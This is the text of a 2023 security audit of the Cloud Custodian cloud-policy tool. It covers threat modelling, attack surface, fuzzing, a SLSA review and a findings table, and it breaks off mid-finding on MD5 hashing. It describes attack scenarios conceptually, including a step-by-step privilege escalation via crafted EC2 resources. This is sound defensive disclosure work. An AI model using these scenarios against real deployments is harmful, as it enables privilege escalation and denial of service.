Email\nAdam\nKorczynskiAuditor Ada Logics Ltd adam@adalogics.com\n(Arthur)\nSheung Chi\nChanAuditor Ada Logics Ltd arthur.chan@adalogics.com\nDavid\nKorczynskiAuditor Ada Logics Ltd david@adalogics.com\nKapil\nThangaveluCloud Custodian\nMaintainerCloud Custodian kapil@stacklet.io\nAmir\nMontazeryFacilitator OSTIF amir@ostif.org\nDerek Zimmer Facilitator OSTIF derek@ostif.org\nHelen Woeste Facilitator OSTIF helen@ostif.org\nCloud Custodian Security Audit 2023 4Cloud Custodian Security Audit 2023 17 apr 2024\nExecutive summary\nIn late 2023 Ada Logics conducted a security audit of Cloud Custodian. The audit was facilitated by\nthe Open Source Technology Improvement Fund (OSTIF) and funded by the Cloud Native Computing\nFoundation. Cloud Custodian is a command line tool that allows users to manage cloud resources\nacross multiple cloud ecosystems by way of yaml policies. Cloud vendors require developers to define\npolicies by way of programming languages such as Python, and developers will often need to write\npolicies specifically for a particular cloud environment. With Cloud Custodian, users can write their\ndesired policies in a cloud-agnostic format - yaml - and depend on Cloud Custodian to translate this\ninto effective, cloud-specific policies.\nAda Logics began the engagement by formalizing a threat model for Cloud Custodian. The threat model\nwas helpful to us as we audited the source code. Once we had initiated the threat model, we continued\niterating over it throughout the entire audit as we learned more about the project. With the first version\nof the threat model, we began the manual review. In this part of the audit, we looked at a range of\nthreats to Cloud Custodian. We also began work on setting up a fuzzing suite for Cloud Custodian,\nwhich included writing fuzzers for Cloud Custodian and settig up the infrastructure for the fuzzers to\nrun continuously.\nIn summary, during the engagement, we:\n•Formalized a threat model of Cloud Custodian\n•Audited Cloud Custodians code base for security vulnerabilities.\n•Integrated Cloud Custodian into OSS-Fuzz.\n•Wrote a targeted fuzzing suite for Cloud Custodian.\nCloud Custodian Security Audit 2023 5Cloud Custodian Security Audit 2023 17 apr 2024\nThreat model\nIn this section we present the findings from threat modelling Cloud Custodian. We first enumerate\nCloud Custodians main components, tools and dependencies. We then proceed to an overview of a\ncrucial part of Cloud Custodian: policies. After that, we introduce the data flow of a Cloud Custodian\ndeployment at a high level. Here, we show how data and trust travels through Cloud Custodian and\nwhere trust changes. Finally, we enumerate the threat actors that could impact the security of Cloud\nCustodian.\nEach aspect of the threat model gives a different perspective to Cloud Custodians security model; When\nwe later consider specific security issues found during the manual auditing goal, having enumerated\nthe threat actors allows us to consider potential security risks against an attacker. The threat actors\nallow us to ask questions such as “who has privileges to trigger this issue?” . The data flow findings are\nhelpful for the process of auditing, ie. to identify particular exposed components of Cloud Custodian,\nas well as when considering the threat from a particular finding. The trust flow analysis locates the\nthreat actors and attack vectors that a given vulnerability is reachable to.\nThe Cloud Custodian policies are a core component of Cloud Custodians security model. We therefore\ngo into deeper detail with these in the threat model and consider them from different perspectives.\nThe threat model is intended to assist multiple audiences. First and foremost, the threat model helps\nthe auditors of this particular security audit. At a higher level, that translates to be helpful to other\nsecurity researchers that wish to review Cloud Custodians security posture independently of this\nsecurity audit conducted by Ada Logics. For this community, the threat model gives an advanced entry\ninto the internals of Cloud Custodian as well as a high-level view of Cloud Custodians threat model.\nSecondly, the threat model can be a perspective to the Cloud Custodian maintainers when assessing\ncommunity-based security disclosures; It helps consider the same angles of a vulnerability report as a\nsecurity researcher takes. Thirdly, the threat model can also be of interest for Cloud Custodian users\nthat notice unexpected behavior in their use cases. The root cause of such cases can be bugs or security\nvulnerabilities, and becfore disclosing these publicly, users can assess them from Cloud Custodians\nthreat model.\nMain components in scope\nCloud Custodians code base is roughly split into two high-level categories: 1) a list of core packages\nwith supporting tools and 2) providers for cloud services. The packages vary in maturity from sandbox\npackages or components under development to mature, production-grade packages. The sandbox and\ndevelopment packages were out of scope for the audit. The table below shows all the Cloud Custodian\ncomponents in scope for the audit.\nCloud Custodian Security Audit 2023 6Cloud Custodian Security Audit 2023 17 apr 2024\nCore package\nComponents Description\nc7n Core package for the cloud custodian project. It contains the cli.py and\ncommands.py to accept command line calls to the cloud custodian and act as\nthe front end of the tools. It also has different supporting classes to handle\nthe parsing and execution of requests or queries with the supporting\nschemas.\nc7n/actions Part of the policy handler, handles the actions to be performed on the filtered\ntarget services or components. It can be changed or simply queried.\nc7n/filters Part of the policy handler, it handles the choice requirement to filter out the\ntarget services or components to which this policy will apply.\nc7n/reports Part of the policy handler, it displays the report showing the result of the\nprevious policy execution with the given policy.\nc7n/resources Template schema and other configurations and controls classes for different\ncloud services actions, queries, and requests\nCloud service providers\nComponents Description\ntools/c7n_azure Custodian provider package to support Azure\ntools/c7n_gcp Custodian provider package to support GCP\ntools/c7n_kube Custodian provider package to support Kubernetes\ntools/c7n_oci Custodian provider package to support OCI\ntools/c7n_tencentcloud Custodian provider package to support Tencent cloud\ntools/c7n_left Tool to evaluate policies with chosen cloud services without actually\nexecuting them\nSupporting tools\nCloud Custodian Security Audit 2023 7Cloud Custodian Security Audit 2023 17 apr 2024\nComponents Description\ntools/c7n_mailer Tool to handle message relay and mailing service across different cloud\naccounts and services\ntools/c7n_policystream Tool to manage and control policies changing history with version control\nThird party components\nComponents Description\nPython poetry Package and dependencies management library\nCloud service API Cloud platform service API for supporting cloud environment, like BOTO3 for\nAWS.\nCloud Custodian policies\nThe core functionality of Cloud Custodian is translation of into YAML commands applicable for different\ncloud enviroments. Users pass their YAML policies to Cloud Custodian, and Cloud Custodian deploys\nthe policy using a scripting language suited for the users cloud environment.\nPolicies are declarative using YAML files that follow a predefined schema predefined and performs some\nactions on resources on the cloud servers that match certain criteria. The action can be immediate\nactions, scheduled activity or policy rules to be enforced. Different actions require different levels of\npermissions and roles depending on the users cloud environment.\nEach cloud provider uses different mechanisms for deploying this type of functionality into their\nplatforms. Learning these mechanisms takes time and effort, and users will have to learn these\nmechanisms for each cloud provider they use. Cloud Custodian abstracts these mechanisms into a\nunified approach supporting different cloud platforms, allowing Cloud Custodian users to use the\nsame declarative approach for all support cloud platforms.\nThe main purpose of Cloud Custodian is to use a unified language to perform policy enforcement and\nactions on the cloud services without the need to develop specific scripts and execution requests\nthrough different cloud service APIs of different cloud providers. In general, Cloud Custodian provides\nan abstraction and abstracts basic syntax of resources, filters, actions, API calls, business logic, and\nother cloud features into declarative YAML-based policies.\nCloud Custodian Security Audit 2023 8Cloud Custodian Security Audit 2023 17 apr 2024\nPolicy validation\nAn important part of Cloud Custodian is to parse policies according to schema to different resource fil-\nters and actions to the cloud service. The correctness and security of policy parameters and definitions\nare important factors in maintaining functional and security-relevant expectations on Cloud Custodian\nto properly and securely translate YAML-based policies into cloud scripts. The major interpretation\nand translation of Cloud Custodian are located in the PolicyLoader class. It takes care of the policy\ninterpretation according to the schema. It also complies with the policies to the permissions and\nroles of the CLI user pushing the policies. In addition, it also has a validation process to ensure the\npolicies are fulfilling the needed settings of the schema and that they do not contain illegal injections\nor characters in the provided settings.\nPolicy continuous integration\nCloud Custodian provides webhood for continuous integration from version control like git repository.\nIt can be added to the Cloud Custodian CLI in the cloud services to activate webhook monitoring to a\ngit repository. Whenever there are new or updated policies being merged. It will trigger the webhook\nand upload the policies to the policies storage in the cloud after validating the policies. It will then\napply to the cloud service if the permissions and roles are allowed. The security responsibility may\npass partly to the git repository management to only allow certain people to merge the policies and\nalso requires checking of possible injections or unwanted actions in those policies. Besides, there are\nalso additional uses of webhooks. Webhook. Periodic policies with webhook action type could be\nadded to Cloud Custodian to point to some URL or repository location. HTTP requests are initialised to\nretrieve resources or filtering information from the URL or repository when the policies are processed.\nNo new policies need to be deployed if the resource status or filtering criteria are changed. This could\nbe applied to cloud servers with frequent policies, resources or configuration changes.\nData flow for Cloud Custodian\nIn this section we present the dataflow of Cloud Custodian.\nA high-level overview of dataflow and trustflow in Cloud Custodian looks as such:\nPolicy developers develop Cloud Custodian policies according to existing schemas in the Cloud Cus-\ntodian service. CLI users retrieve those policies and apply them through Cloud Custodian CLI for\nimmediate or periodic plans, rules or actions on filtered resources. The CLI users need to have enough\npermissions and roles on the target resources in order to apply those policies in the cloud servers.\nIn addition to using existing schemas, Cloud Custodian allows custom schemas for uncovered cloud\nCloud Custodian Security Audit 2023 9Cloud Custodian Security Audit 2023 17 apr 2024\nFigure 1: Data flow for Cloud Custodian from CLI entry point\nCloud Custodian Security Audit 2023 10Cloud Custodian Security Audit 2023 17 apr 2024\nservices API combinations, that is, if Cloud Custodian adopters have a specific use case to their need,\nthey can write their own schemas.\nWhen a user or an automated service (“Github Repository” in the diagram) deploy policies, the Policy\nValidator validates them for correctness of the policies and that the CLI users permissions correspond\nto the permissions in the schemas. After the Policy Validator has validated a policy, Cloud Custodian\npolicy handlers translate the valid policies to different types of cloud service requests, target filters\nor lambda functions and push them to the cloud services storage and register triggering events or\nexecute them immediately. Depending on the actions from the policies, the cloud server may store\npolicies as periodic events, or perform immediate actions. Sometimes it will also enable continuous\nlogging or returning the current snapshot data of the cloud servers on request or storing them in the\nCloud bucket. The cloud admin can control the stored policies and also the IAM roles for both the\npolicies and the CLI users that could deploy policies. Lastly, If need be, auditors can audit the logs and\nsome long term triggering events of policies to ensure it complies with the consumers internal or legal\nregulations.\nEntry through Cloud event triggering\nIn this section we cover Cloud Custodians event-based triggering of policies.\nAt a high level, Cloud Custodian supports three types on invocations besides directly invoking a\npolicy:\n1. Event-triggered policies When an event-triggered policy runs through Cloud Custodian CLI, it\nwill register event filterings in the given cloud service with certain patterns on the CloudWatch event\nbus. When a change happens on resources or services, the CloudWatch bus will stream a System\nevent to registered Lambda services, if the patterns filter is matching, the lambda functions will be\ninvoked. This kind of policy deployment allows Cloud Custodian to deploy translated actions into\nlambda functions and store them in the cloud service. The functions are then registered to be invoked\nwhen a certain CloudWatch Events API has been called. This is done by pattern filtering in the Cloud\nCustodian policies and is translated to lambda functions that determine if the streamed system event\nmatches the invocation requirements of the functions.\n2. Periodic-triggered policies Periodic-triggered policies are similar to event-triggered policies in\nwhich the lambda functions invocation is also triggered by CloudWatch Event API. But instead of trig-\ngering based on certain resources or service changes status, Cloud Custodian registers a periodic event\nin the CloudTrail to periodically send triggering requests to CloudWatch Event API and trigger a new\nCloud Custodian Security Audit 2023 11Cloud Custodian Security Audit 2023 17 apr 2024\nsystem event. This kind of periodic registration could also be filtered by patterns and resources/services\ntargets, which could be configured by the Cloud Custodian policies.\n3. Config rules triggered policies Besides the above two types of event triggering lambda function\ninvocation, there is an additional config rules triggered policies. These types of policies trigger the\ninvocation of stored lambda functions when a certain service or resource configuration has been made\non the cloud services. The policies register a certain config rules monitoring in the cloud services,\nwherever there is a configuration change, it will match the changes with the rules registered and invoke\nthe target lambda functions if the rules match.\nFigure 2: Data flow for Cloud Custodian to register triggering criteria for policies\nOnce a policy has been translated into a lambda function on a cloud platform, the Cloud Custodian\nuser can set up their environment in such a manner that the lambda function gets invoked when an\nevent takes place. In the case of AWS, users can for example use the AWS CloudTrail, CloudWatch and\nconfig rules services to deploy event-triggered lambda functions in their cloud. The translated lambda\nfunctions are stored in the AWS Lambda Services with roles and permission enforced on the invocation\nCloud Custodian Security Audit 2023 12Cloud Custodian Security Audit 2023 17 apr 2024\nof those stored lambda functions. There are 3 types of ways supported by Cloud Custodian to trigger\nthe events. But it is also important to remark that once the lambda functions have been created and\ndeployed to the AWS lambda services, any IAM roles of users or triggered events match the one enforced\non those lambda functions, the lambda functions would be invoked. That opens a possibility that a\nlambda function deployed through this setting through Cloud Custodian may trigger an unexpected\nevent if it matches some of the events or configuration rules. Users can perform additional monitoring\nof the execution and triggering of these stored lambda functions can be done by specifying monitoring\nand reporting options to the CloudTrails through Cloud Custodian policies, then log or other metrics\nare stored in S3 Bucket and could be audited or viewed in a later stage.\nTrust Boundaries\nAs the Cloud Custodian is installed in the management services of the cloud servers, the CLI users\ncertainly need to connect to the target cloud servers to execute the policies. Thus the policies are\nsurely going through the network boundary from the local environment of the CLI users to the remote\ncloud management servers with Cloud Custodian installed. The other possible network boundary\nis the boundary between the Cloud Custodian and the target cloud services. Although they should\nbe located in the same cloud network which could be manageable by the same cloud management\nconsole, the management server and the target cloud services may be located in different subnetworks.\nThat creates another possible network boundary.\nThreat actors\nCloud custodian is assumed to be run in a cloud console where all the actors should be either trusted\nor controlled by the Cloud IAM service.\nThreat Actor DescriptionLevel of\ntrust\nCLI Users Users that push policies to cloud services to perform actions on the filtered\ntarget resources with their own IAM rolesHigh\nCloud\nAdminsUsers that monitor and manage the cloud server where Cloud Custodian is\nrunning.Full\nPolicy\nDevelopersUsers that create Cloud Custodian policies to be deployed to the cloud\nserver.High\nSchema\nDevelopersUsers that create schema or plugins to extend the functionality of Cloud\nCustodian.Low\nCloud Custodian Security Audit 2023 13Cloud Custodian Security Audit 2023 17 apr 2024\nThreat Actor DescriptionLevel of\ntrust\nAuditor Users to monitor and audit logs, policy status, periodic events and rules to\nensure overall security and accuracy of the policy enforcement.Low\nOther cloud\nusersSome Cloud Custodian policies may depending on other cloud services or\nevents. Thus other cloud users with different IAM roles that control some\ncloud services or events could trigger some stored Cloud Custodian policies.Low\nAttack surface\nIn this section we present Cloud Custodians attack surface.\nThe attack surface represents the entrypoints into a system that an attacker could utilize to compro-\nmise the system. The attack surface describes both the known and expected entrypoints as well as\nunexpected or unintended entrypoints. Delineating the attack surface is helpful in understanding the\ntypes of threats and threat actors that could negatively impact the system. In this section we present\nthe attack surface of Cloud Custodian; Later in the audit, we use the findings from the threat modelling\ndetailing the attack surface in the manual auditing goal of the audit.\nA fundamental property of Cloud Custodians security model is that it is deployed in a cloud environment\nsuch as AWS, Azure, Google Cloud and Kubernetes. Cloud Custodian inherits substantial parts of the\nsecurity model of these platforms. As such, these platforms also represent an attack surface for Cloud\nCustodian; If there are vulnerabilities in the underlying platform, Cloud Custodian can be vulnerable\nto these as well. In other words, if an attacker can compromise the underlying cloud platform, Cloud\nCustodian has no or few defense mechanisms between itself and the cloud platform. During our\nanalysis of Cloud Custodian, we found several indicators that Cloud Custodian accepts this inherited\nattack surface. For example, Cloud Custodian decompresses the user data of EC2 instances without\nchecking its size or buffering the output (Line 817-818 below):\nhttps://github.com/cloud-custodian/cloud-custodian/blob/\n50d9f139de4a78aa32766f86f64e438cf7a8158a/c7n/resources/ec2.py#L803-L821\n803 def process_instance_set(self, client, resources):\n804 results = []\n805 for r in resources:\n806 ifself.annotation not in r:\n807 try:\n808 result = client.describe_instance_attribute(\n809 Attribute= 'userData ',\n810 InstanceId=r[ 'InstanceId '])\n811 except ClientError as e:\nCloud Custodian Security Audit 2023 14Cloud Custodian Security Audit 2023 17 apr 2024\n812 ife.response[ 'Error ']['Code '] == '\nInvalidInstanceId.NotFound ':\n813 continue\n814 if'Value 'not in result[ 'UserData ']:\n815 r[self.annotation] = None\n816 else :\n817 r[self.annotation] = deserialize_user_data(\n818 result[ 'UserData ']['Value '])\n819 ifself.match(r):\n820 results.append(r)\n821 return results\nCluster users with lower privileges can control EC2 instances and craft a malicious EC2 instance with\nuser data that decompresses into a large blob size would cause denial of service of Cloud Custodian,\nsince it would read the decompressed blob into memory. Cloud Custodian does not guard against\nthis attack but is also not vulnerable to it, because the limit of the user data of EC2 instances on the\nunderlying platform - AWS - is 16KB. As such, to cause a denial of service, an attacker needs to find a\nway to circumvent the restriction on AWS’s max allowed size on EC2 user data.\nThis is an example of how Cloud Custodian integrates into the underlying platform to use their hard-\nening in its own security posture. There are pros and cons to this. On the pros side, Cloud Custodian\nbenefits from the security work made on the cloud platforms. Leaving out hardening mechanisms and\nrelying on the hardening made by the cloud platforms avoids bloat of the Cloud Custodian code base.\nFurthermore, Cloud Custodian avoids hardening on an attack vector that is expensive for attackers to\ncompromise through. On the cons side, if an attacker can compromise the underlying cloud platform,\nthey have a large attack surface available and can cause a lot of havoc for Cloud Custodian users. In\naddition, Cloud Custodian is susceptible to issues arising from unexpected or unnoticed changes in\nthe resource limits and sanitization for cloud resources.\nAnother attack vector is by way of cluster resources, ie. by creating or modifying cluster resources in such\na way that when Cloud Custodian queries them, Cloud Custodian will behave unexpectedly - possibly in\nan insecure way. This attack vector requires cluster privileges for the attacker, albeit minimum create or\nedit-privileges are sufficient. Cloud Custodian can handle resources insecurely when running policies\nonce or periodically, and a cluster user can craft a resource that causes unexpected behavior in Cloud\nCustodian and triggers security vulnerabilities. This type of attack requires a CLI user to write and/or\ndeploy policies, and the attacker would need to know which Cloud Custodian policies are deployed.\nCloud Custodian users with multiple users of varying vertical permission levels are prone to this attack\nvector. An sample attack would progress as such:\n1. Cluster admin creates a cluster user without create privileges but with edit privileges.\n2. Cluser admin deploys a policy that periodically queries all EC2 instances in the cluster.\n3.The cluster user created in step 1 knows that the policy created in step 2 mishandles an EC2\ninstance with a particular name, and instead of reading the name, it creates 100 new EC2 instances\nCloud Custodian Security Audit 2023 15Cloud Custodian Security Audit 2023 17 apr 2024\nthat are not restricted by any limitations from policies in the cluster. The cluster user creates the\nEC2 instance with the malicious name.\n4.The cluster user has managed to create 100 EC2 instances with their own specifications and has\nthereby succesfully escalated privileges.\nFrom the perspective of a standard Cloud Custodian use case, this is an exposed attack surface, since it\noriginates from an intended way of using Cloud Custodian. Cloud Custodian should be able to handle\na user base with different permission levels without exposing itself to privilege escalations. We note\nthat this attack surface also relies on authorization mechanisms of the underlying cloud platform,\nhowever, this attack surface is exposed to cluster users even when the authorization mechanisms work\nas intended; If the user has permissions to create EC2 instances, they do no need to escalate privileges\nand be able to delete EC2 instances or create S3 buckets in order to exploit a vulnerability in cluster\nresource handling.\nCloud Custodian allows deploying policies that have no immediate effect and are only triggered by\ncertain cloud events, these policies are translated and stored in the cloud as stored actions (lambda\nfunction in AWS) or stored policies in the policy bucket. For example, Cloud Custodian can register\nevent monitoring and trigger in AWS through AWS Cloud Trail surface. If the registered cloud event has\nhappened, the AWS Cloud Trail invokes the stored actions (Lambda functions in AWS) with the details\nof the cloud events. If the stored actions translated from Cloud Custodian policies use some of the\ninformation from the cloud events without proper validation or sanitization, they are vulnerable to\nattacks like injections or Denial-of-service. The actions could also cause unexpected behaviours or\nprivilege escalation if the stored actions are invoked with IAM roles with higher privileges. An attacker\ncould observe or guess the stored and cloud event registered Cloud Custodian policy actions and\nspecifically trigger a cloud event with malicious data. In this situation, the attacker only requires IAM\nroles that have permission to trigger that cloud event and still invoke the stored Cloud Custodian policy\nactions even if those policy actions are executing in different IAM roles.\nAttack surface Description\nCloud\nCustodian CLICloud Custodian CLI is one of the entry points for accepting policies and performing\nactions on the cloud with the user’s IAM roles. Privilege escalation or injection\ntargeting the cloud could go passed an insecure or over-privileged CLI.\nCloud\nCustodian\nPolicyCloud Custodian defines what actions are performed on what resources are in the\ncloud. Attackers could target to trick legitimate users into creating a policy to\ncomplete some unexpected actions in the cloud.\nCloud Custodian Security Audit 2023 16Cloud Custodian Security Audit 2023 17 apr 2024\nAttack surface Description\nCloud\nCustodian\nschemaCloud Custodian schema translates a YAML policy into actions in the Cloud\nenvironment. Adopting third-party or custom schema to Cloud Custodian could\nopen up unexpected translations and perform unexpected actions in the cloud.\nCloud\ntriggering\neventsCloud Custodian allows deploying policies that have no immediate effect and are\nonly triggered by certain cloud events. Changes in the existing cloud events could\ncause unexpected policies to be triggered.\nCloud IAM\nservicesCloud Custodian policies are running with the IAM roles of the user deploying the\npolicies. Over-privileged IAM roles for Cloud Custodian could allow privilege\nescalation on the cloud.\nAttacker objectives\nPrivilege escalation in the cloud\nMost of the privilege management in the cloud is done by IAM services. Attackers may make use of the\nCloud Custodian to escalate its privilege in the cloud if the IAM roles for the Cloud Custodian are not\ncorrectly configured or over-privileged.\nMess up with services and resources of the cloud\nWith enough privilege, the Cloud Custodian could perform almost any action in the cloud. Attackers\nmay make use of the high-privilege IAM role of Cloud Custodian to perform some unexpected actions\nin all other cloud services.\nGain information from the cloud services and resources\nWith enough privilege, the Cloud Custodian could perform almost any action in the cloud. Attackers\nmay make use of the high-privilege IAM role of Cloud Custodian to retrieve information or data in some\nprotected resources.\nCloud Custodian Security Audit 2023 17Cloud Custodian Security Audit 2023 17 apr 2024\nFuzzing\nAs part of the audit, Ada Logics wrote a fuzzing suite for Cloud Custodian consisting of 11 fuzzers\ntargetting primarily resource handling and validation methods for resources from multiple cloud\nproviders that Cloud Custodian supports. In addition, Ada Logics built the infrastructure to suppor\ncontinuous fuzzing; We did that by integrating Cloud Custodian into OSS-Fuzz which is an open-source\nproject created and run by Google that offers automation of different aspects of a healhty fuzzing\nworkflow. This includes running the fuzzers periodically, reporting of found bugs by the fuzzers, testing\nfor bug fixes and more - all done in an automated manner with technical details available for bugs such\nas stack traces and reproducer testcases. A continuous fuzzing setup is an important part of software\nsecurity and upon completion of this audit, Cloud Custodian is fuzzed continuously, even after the\naudit has concluded.\nIn this audit we took the high level approach of adding coverage to validation, processing and parsing\nroutines to resource types, actions and filters. This resulted in multiple alike fuzzers organized by\nprovider or subdirectories. The goal was to add coverage to class methods that processing input, which\nfor some classes has higher complexity than others. Some of the calls in the fuzzers are to methods in\nCloud Custodian that are not complex compared to other classes. Nonetheless, we added coverage\nto those methods to add as much coverage to validation, processing and parsing as time permitted\nin this audit. The fuzzing work done by Ada Logics in this audit was Cloud Custodians first step into\nadding fuzzing its codebase, and adding coverage was the main priority of our fuzzing work.\nAll fuzzers can be found in Cloud Custodians OSS-Fuzz project folder: https://github.com/google/oss-\nfuzz/tree/master/projects/cloud-custodian. OSS-Fuzz builds builds the fuzzers using its Dockerfile and\nbuild script. The Dockerfile moves the fuzzers to the Docker environment at build time, and the\nbuild script builds the fuzzers.\nThese are the fuzzers, we have written during the audit:\nfuzz_actions_parser\nThis fuzzers adds coverage for the parse method of the ActionRegistry class.\nfuzz_actions_process\nThis fuzzer tests the process methods of multiple actions classes: 1) AutoTagUser , 2)Notify ,\n3)LambdaInvoke , 4)Webhook , 5)AutoScalingBase and 6) PutMetric . In each fuzz iteration,\nthe fuzzer will choose the class to test, create an object of the class using the data from the fuzzer and\ninvoke the objects process method. For AutoTagUser andNotify , the fuzzer will first validate\nthe object before invoking their process method.\nCloud Custodian Security Audit 2023 18Cloud Custodian Security Audit 2023 17 apr 2024\nfuzz_actions_validate\nThis fuzzer targets the validate methods of 3 classes of the c7n/actions sub directory: 1)\nAutoTagUser , 2)ModifyVpcSecurityGroupsAction and 3) Notify . The fuzzer chooses\nwhich class to create an object from in each iteration and creates and object using the fuzz testcase.\nFinally, the fuzzer invokes the objects validate method.\nfuzz_filters_parser\nTests the parsing routines of the c7n/filters subdirectory. This includes the parse methods of\ntheFilterRegistry class, as well as multiple parsers from the offhours filter. The fuzzer decides\nwhether to fuzz either the FilterRegistry parse method or two parse methods of the offhours\nfilter in each fuzz iteration.\nfuzz_filters_process\nTests the process methods of the core filters (the c7n/filters subdirectory). The fuzzer tests\nin total 12 classes, and picks one to test in each iteration. The fuzzer creates an object of the\npicked class using the fuzz testcase. When invoking the process method, the fuzzer will pass a\ndictionary The 12 classes that the fuzzer tests the process methods of are: 1) MultiAttrFilter ,\n2)Missing , 3)OnHour , 4)OffHour , 5)SubnetFilter , 6)NetworkLocation , 7)Diff , 8)\nConsecutiveAwsBackupsFilter , 9)HealthEventFilter , 10) HasStatementFilter ,\n11)CrossAccountAccessFilter and 12) AccessAnalyzer . The fuzzer passes a series of\nresources to the process method of each object. This tests for edge cases in resources that could\nimpact Cloud Custodian in a negative way concerning both its security and reliability. For selected\nclasses, the fuzzer will validate the object before invoking its process method which mimicks Cloud\nCustodian production use case.\nfuzz_filters_validate\nTests the validate methods of 10 filters classes located in the c7n/filters subdirectory of\nthe Cloud Custodian source tree. These are the same classes that invoke their validate method\nbefore their process method in the fuzz_filters_process , however this fuzzer is more focused\non validation.\nCloud Custodian Security Audit 2023 19Cloud Custodian Security Audit 2023 17 apr 2024\nfuzz_gcp_actions_validate_process\nTests validation and processing routines of four classes from the c7n_gcp tool.c7n_gcp enables\nGCP support in Cloud Custodian, and in this fuzzer we implement similar testing logic to the fuzzers\ntesting the validation and processing of the core Cloud Custodian classes.\nfuzz_gcp_filters_validate_process\nTests the validation and processing of GCP resources. The fuzzer instantiates a resource using\nthe testcase of each iteration and invokes its process method. It validates four of the re-\nsource types before invoking their process method. The fuzzer tests the following resource\ntypes: 1) LabelActionFilter , 2) RecommenderFilter , 3) GCPMetricsFilter , 4)\nSecurityComandCenterFindingsFilter , 5)TimeRangeFilter , 6)IamPolicyFilter\nand 7) AlertsFilter . The fuzzer instantiates a resource manager and add an ActionRegistry\nand a FilterRegitry to it.\nfuzz_gcp_resources_process\nTests the processing of GCP-specific classes, specifically 1) ServerConfig , 2)SQLInstance ,\n3)KmsLocationKmsKeyringFilter , 4) EffectiveFirewall , 5) HierarchyAction\nand 6) AccessApprovalFilter . In each fuzz iteration, the fuzzer creates one object of either\nof the 6 classes using the fuzzers testcase to instantiate the object. Next, the fuzzer sets up a\nResourceManager and adds an ActionRegistry and a FilterRegistry . Finally, the fuzzer\ninvokes the objects process method catching exceptions that the fuzzer should not report.\nfuzz_query_parser\nThis fuzzer tests two parsers: 1) QueryParser and 2) C7NJMESPathParser - both from the util\nmodule. The fuzzer passes a unicode string of maximum 1024 in length.\nfuzz_resources_parser\nThis fuzzer tests 5 parsing routines: 1) Cloud Custodians aws Arn parser, 2) the ec2 QueryFilter parser, 3)\nthe health QueryFilter parser, 4) the sagemaker QueryFilter and 5) the emr QueryFilter .\nThe fuzzer invokes one of the parsing routines in each fuzz iteration with a unicode string.\nCloud Custodian Security Audit 2023 20Cloud Custodian Security Audit 2023 17 apr 2024\nfuzz_resources_process\nTests the process methods of almost 60 core resource types. The fuzzer first selects a resource type,\nthen creates an object of that type using the fuzzers input test case to generate a pseudo-random\nobject. Finally the fuzzer invokes the objects process method.\nfuzz_resources_validate\nTests the validate methods of almost 60 core resource types. The fuzzer first selects a resource\ntype, then creates an object of that type using the fuzzers input test case to generate a pseudo-random\nobject. Finally the fuzzer invokes the objects validate method.\nCloud Custodian Security Audit 2023 21Cloud Custodian Security Audit 2023 17 apr 2024\nSLSA review\nADA Logics carried out a SLSA review of Cloud Custodian. SLSA (https://github.com/slsa.dev) is a\nframework for assessing the security practices of a given software-project with a focus on mitigating\nsupply-chain risk. SLSA emphasises tamper resistance of artifacts as well as ephemerality of the build\nand release cycle.\nSLSA mitigates a series of attack vectors in the software development life cycle (SDLC) all of which\nhave seen real-world examples of succesful attacks against open-source and proprietary software.\nBelow we see a diagram made by the SLSA illustrating the attack surface of the SDLC.\nFigure 3: Data flow for Cloud Custodian to register triggering criteria for policies\nEach of the red markers should different areas of possible compromise that could allow attackers to\ntamper with the artifact that the consumer invokes at the end of the SDLC.\nSLSA splits its assessment criteria into 4, increasingly demanding levels. At a high level, the higher the\nlevel of compliance, the higher tamper-resistance the project ensures its consumers.\nCloud Custodian releases its binaries on Github Actions using .github/workflows/release.yml. Github\nActions fulfills a number of criteria of SLSA. Github Actions provisions a fresh build environment for\nevery build thereby fulfilling SLSAs requirement of isolation and hermeticity. These are great, and\nimportant features of a hardened build platform. The current version of SLSA emphasises these features\nof the build platform, but projects must have a provenance available to conform to SLSA Level 1. Cloud\nCustodian does not currently include a provenance statement with releases, and as such is currently at\nSLSA L0.\nCloud Custodians most important task in terms of SLSA compliance is to add a provenance statement\nto releases and gradually improve compliance of that provenance statement to higher levels of SLSA,\nCloud Custodian Security Audit 2023 22Cloud Custodian Security Audit 2023 17 apr 2024\nsuch as making it verifiable. We recommend adding this using SLSAs slsa-github-generator (https:\n//github.com/slsa-framework/slsa-github-generator).\nCloud Custodian Security Audit 2023 23Cloud Custodian Security Audit 2023 17 apr 2024\nFound issues\nHere we present the issues that we identified during the audit.\n# ID Title Severity Fixed\n1 ADA-CC-2023-1 Use of a broken or weak\ncryptographic hashing algorithm for\nsensitive dataLow No\n2 ADA-CC-2023-2 Insecure temporary file creation Informational Yes\n3 ADA-CC-2023-3 Missing sanitisation in using Jinja2\nlibraryLow No\n4 ADA-CC-2023-4 Using deprecated and insecure\nssl.wrap_socketLow No\n5 ADA-CC-2023-5 Index out of range in ARN parser Informational Yes\n6 ADA-CC-2023-6 Improper URL substring validation\ncan leak dataLow Yes\n7 ADA-CC-2023-7 Possible DoS from\nattacker-controller Github accountLow Yes\n8 ADA-CC-2023-8 Possible DoS from\nattacker-controller Github\nrepositoryLow Yes\n9 ADA-CC-2023-9 Possible zip bomb from large S3\nobjectModerate No\n10 ADA-CC-2023-10 Privilege escalation through chained\nLambda functions in AWSModerate No\nCloud Custodian Security Audit 2023 24Cloud Custodian Security Audit 2023 17 apr 2024\nUse of a broken or weak cryptographic hashing algorithm for sensitive\ndata\nSeverity Low\nStatus Reported\nid ADA-CC-2023-1\nComponent c7n resources\nget_finding function and get_item_template function uses some weak cryptographic hashing algo-\nrithms like MD5 or SHA-1. Some of these usages are used for non-sensivite data, however, they might\nstill have a minor impact of a potential attack vector. The get_item_template function uses MD5 to\ncalculate a debup token for retrieving an item template for local storage or codebase for further pro-\ncessing. The weak MD5 hash allows a 2nd preimage attack which could make an attacker create another\ninput that can produce the same hash and replace the original item template (or replace what item\ntemplate is to be returned) for further processing, which may cause unexpected execution results.\nget_finding function uses MD5 on policies to determine a finding_id in post finding operations of\nAWS security hubs function. Cloud Custodian can generate a policy to provision a lambda function\nthat will process findings from AWS resources and act on them when certain criteria are matched. For\nexample, it could process findings from AWS guard duty on all IAM users to remove their access keys if\nthe key exists when not allowed. These policies generate a data set called findings to record the\ndetails of the target that needs to perform actions (or further monitored) on IAM resources. The code\nbelow uses the MD5 hashes of the policies data for the finding generation operation as its finding_id .\nThis setting is vulnerable because an attacker could create different policies with the same hash in\norder to pretend it is the designated policy and thus result in incorrect finding target to be processed\nby future actions or periodic triggers.\nhttps://github.com/cloud-custodian/cloud-custodian/blob/d458f0a/c7n/resources/securityhub.py#L525-\nL530\n525 def get_finding(self, resources, existing_finding_id, 